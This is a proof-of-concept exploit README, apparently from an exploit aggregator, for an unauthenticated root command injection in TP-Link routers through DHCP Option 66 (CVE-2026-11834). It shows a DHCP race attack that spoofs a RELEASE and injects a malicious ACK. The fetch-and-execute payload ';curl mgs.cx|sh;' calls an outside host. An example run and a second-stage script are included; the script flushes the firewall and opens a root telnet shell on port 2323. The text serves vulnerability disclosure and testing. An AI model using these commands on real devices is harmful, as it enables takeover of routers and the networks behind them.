## https://sploitus.com/exploit?id=F3832E4F-76F3-50B7-92A3-92EB0B582EB1
# CVE-2026-11834 (PoC)
TP-Link DHCP Option 66 Unauthenticated RCE (CVE-2026-11834)
## Overview
A command injection vulnerability (CWE-78) in the DHCP Option 66 ("TFTP Server Name") handling of TP-Link router firmware allows an unauthenticated attacker on the same network segment to execute arbitrary commands as root. When the device acts as a DHCP client on its WAN interface, the Option 66 value returned in a lease is concatenated unsanitised into a `tftp` shell command within `libcmm.so`. Five functions build this command and pass it to `util_execSystem()`, which calls `system()`, so a crafted Option 66 value is interpreted as shell input and executed as root.
The Option 66 value is truncated to 16 characters on the device, so the payload is a minimal fetch-and-execute (`;curl |sh;`) that pulls a larger second stage over HTTP.
The attacker does not need to control the DHCP server. This PoC races the legitimate server on the segment: it spoofs a DHCP `RELEASE` as the target to clear its binding, waits for the target to re-acquire its lease, then answers the target's broadcast with a malicious `OFFER`/`ACK` carrying the payload before the legitimate server replies.
This Proof of Concept (PoC) was tested against the TP-Link Archer C20 V6 (firmware 0.9.1 Build 4.19, EU). The vulnerable code path is shared across a range of TP-Link routers; memory offsets, function addresses, and behaviour may differ on other models or firmware versions.
## Warning
This PoC delivers an Option 66 payload that is executed as root on the target device. The example second stage drops the device firewall and starts a telnet listener. Only run this against hardware you own or are explicitly authorised to test.
## Usage
```bash
$ sudo python3 cve-2026-11834.py -i -s -S -p ''
```
| Argument | Description |
| --------------------- | -------------------------------------------------------------------------- |
| `target_ip` | Current IP address of the target device |
| `-i`, `--interface` | Network interface on the target's segment |
| `-s`, `--server-ip` | Legitimate DHCP server IP |
| `-S`, `--server-mac` | Legitimate DHCP server MAC |
| `-p`, `--payload` | Option 66 value (|sh;` |
| `-t`, `--target-mac` | Target MAC (auto-resolved via ARP if omitted) |
| `-a`, `--attacker-ip` | Server-id advertised in the malicious lease (defaults to the interface IP) |
Example run:
```bash
$ sudo python3 cve-2026-11834.py 10.0.10.110 -i eth0 -s 10.0.10.254 -S 00:f2:8b:99:86:46 -p ';curl mgs.cx|sh;'
TP-Link DHCP Option 66 Unauthenticated RCE (CVE-2026-11834) - Race Attack
Target IP : 10.0.10.110
Target MAC : 3c:64:cf:7b:69:8b
DHCP Server : 10.0.10.254 (00:f2:8b:99:86:46)
Attacker IP : 10.0.10.5
Interface : eth0
Payload : ;curl mgs.cx|sh;
[*] Sending spoofed DHCP RELEASE for 10.0.10.110
[*] RELEASE sent. Waiting for target to re-acquire lease...
[!] Got DHCP REQUEST from 3c:64:cf:7b:69:8b, XID: 0x43edad72
[>] Sending malicious DHCP ACK...
[>] ACK sent. Payload delivered.
```
The payload host serves a second stage that the device fetches and runs. For example:
```bash
$ cat index.html
echo "[*] Execution"
iptables -F
iptables -P INPUT ACCEPT
echo "[*] Firewall rules dropped"
telnetd -l /bin/sh -p 2323 -b 0.0.0.0
echo "[*] Telnetd started on port 2323"
$ sudo python3 -m http.server 80
```
## Links
- Full Writeup: https://mattg.systems/posts/cve-2026-11834/
- CVE Record: https://www.cve.org/cverecord?id=CVE-2026-11834
- TP-Link Security Advisory: https://www.tp-link.com/uk/support/faq/5141/